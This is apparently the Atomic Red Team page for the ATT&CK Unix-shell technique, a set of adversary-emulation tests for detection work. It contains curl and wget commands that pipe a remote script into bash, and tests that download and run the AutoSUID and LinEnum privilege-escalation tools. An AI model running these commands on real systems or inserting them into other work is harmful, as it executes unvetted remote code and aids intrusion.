Try it using Invoke-Atomic

Command and Scripting Interpreter: Bash

Description from ATT&CK

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence. https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - Create and Execute Bash Shell Script

Creates and executes a simple bash script.

Supported Platforms: macos,linux

auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873

Inputs:

Name Description Type Default Value
script_path Script path Path /tmp/art.sh

Attack Commands: Run with sh!

1
2
3
4
5
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}

Cleanup Commands:

1
2
rm #{script_path}

Atomic Test #2 - Command-Line Interface

Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.

Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in

1
/tmp/art-fish.txt
.

Supported Platforms: macos,linux

auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c

Inputs:

None

Attack Commands: Run with sh!

1
2
3
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash

Cleanup Commands:

1
2
rm /tmp/art-fish.txt

Atomic Test #3 - Harvest SUID executable files

AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.

Supported Platforms: linux

auto_generated_guid: 46274fc6-08a7-4956-861b-24cbbaa0503c

Inputs:

Name Description Type Default Value
autosuid Path to the autosuid shell script Path PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
autosuid_url Path to download autosuid shell script Url https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh

Attack Commands: Run with sh!

1
2
3
chmod +x #{autosuid}
bash #{autosuid}

Cleanup Commands:

1
2
rm -rf #{autosuid}

Dependencies: Run with bash!

Description: AutoSUID must exist on disk at specified location (#{autosuid})

Check Prereq Commands:

1
2
if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
curl --create-dirs #{autosuid_url} --output #{autosuid}

Atomic Test #4 - LinEnum tool execution

LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.

Supported Platforms: linux

auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2

Inputs:

Name Description Type Default Value
linenum Path to the LinEnum shell script Path PathToAtomicsFolder/T1059.004/src/LinEnum.sh
linenum_url Path to download LinEnum shell script Url https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh

Attack Commands: Run with sh!

1
2
3
chmod +x #{linenum}
bash #{linenum}

Cleanup Commands:

1
2
rm -rf #{linenum}

Dependencies: Run with bash!

Description: LinnEnum must exist on disk at specified location (#{linenum})

Check Prereq Commands:

1
2
if [ -f #{linenum} ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
curl --create-dirs #{linenum_url} --output #{linenum}

source